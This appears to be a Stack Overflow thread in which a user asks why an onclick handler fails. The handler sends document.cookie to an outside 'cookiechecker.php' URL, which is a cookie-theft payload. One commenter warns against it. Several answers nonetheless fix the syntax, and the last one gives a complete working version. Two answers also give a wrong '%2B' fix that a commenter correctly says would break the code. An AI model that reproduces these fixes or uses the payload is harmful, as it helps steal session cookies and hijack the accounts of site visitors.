# Alternative for the + sign in javascript

Tags: javascript, hyperlink

So, I've been doing JavaScript for a while now and stumbled upon a problem. When I tried to do a hyperlink with JavaScript encoded into it, the plus sign just disappears and the hyperlink for the JavaScript code doesn't work. So, is there an alternate sign for the plus sign in JavaScript? Is there another sign I can use that does the same functions as a plus sign?

Here is my code:

```
onclick="document.location='site.com/cookiechecker.php?cookie='; +escape(document.cookie);"
```

Comment: Can you post your code? Don't know what you're talking about...

Comment: Do you have to put your script into the `href`, or can you run it using an `onclick`, or better yet, put your script in a function and call the function?

Comment: onclick="document.location='http://www.site.com/cookiechecker.php?cookie=' +escape(document.cookie);"

Comment: *Blanch.* Please don't *ever* be doing things like that. I can't think of any reason to be sending cookies like that, quite apart from the fact that that indicates you're dealing with non-HttpOnly cookies (a security hazard).

Answer (score 0, accepted):

%2b is the hex value for "+". (You may have seen %20 in the address bar before.. Same idea)

Answer (score 1):

Please replace the "+" with its HEX equivalent, "%2B".

Comment: Accepting the answer is the best way to say thanks, isn't it?

Comment: ... what? This has nothing to do with the code you have posted and won't solve it.

Comment: @Ponder: what, then, was your code *actually*? What you posted would have been *broken* by replacing the `+` (the JavaScript operator) with `%2B` (a JavaScript syntax error).

Comment: Well i didnt get the error and thats all that matters. Not to be rude but look at my question. All i wanted was an aleternative sign for the plus sign not some remake of the code

Comment: @Ponder: if other users come back to this post in the future they will get confused by your code, which currently does not work because of your extra `;` char. Why don't you edit the question and say sorry to the other people that spent time to help you but were mislead?

Answer (score 1):

Try this (removing a semicolon):

```
onclick="document.location='site.com/cookiechecker.php?cookie='+escape(document.cookie);"
```

Answer (score 0):

You have a semicolon in there that you need to remove:

```
onclick="document.location='site.com/cookiechecker.php?cookie='+escape(document.cookie);"
```

That semicolon causes the JavaScript to treat your expression as two separate statements instead of one.  It's the equivalent of:

```
document.location = 'site.com/cookiechecker.php?cookie=';
escape(document.cookie);
```

Answer (score 0):

Your code is this:

```
onclick="document.location='site.com/cookiechecker.php?cookie='; +escape(document.cookie);"
```

This means your event handler is this (in expanded form):

```
document.location = 'site.com/cookiechecker.php?cookie=';
+escape(document.cookie);
```

This is not what you want. Remove the semicolon which is separating the two statements.

Also, you are almost certain to be wanting `http://` at the start of the `document.location` value.

Final value:

```
onclick="document.location='http://site.com/cookiechecker.php?cookie='+escape(document.cookie);"
```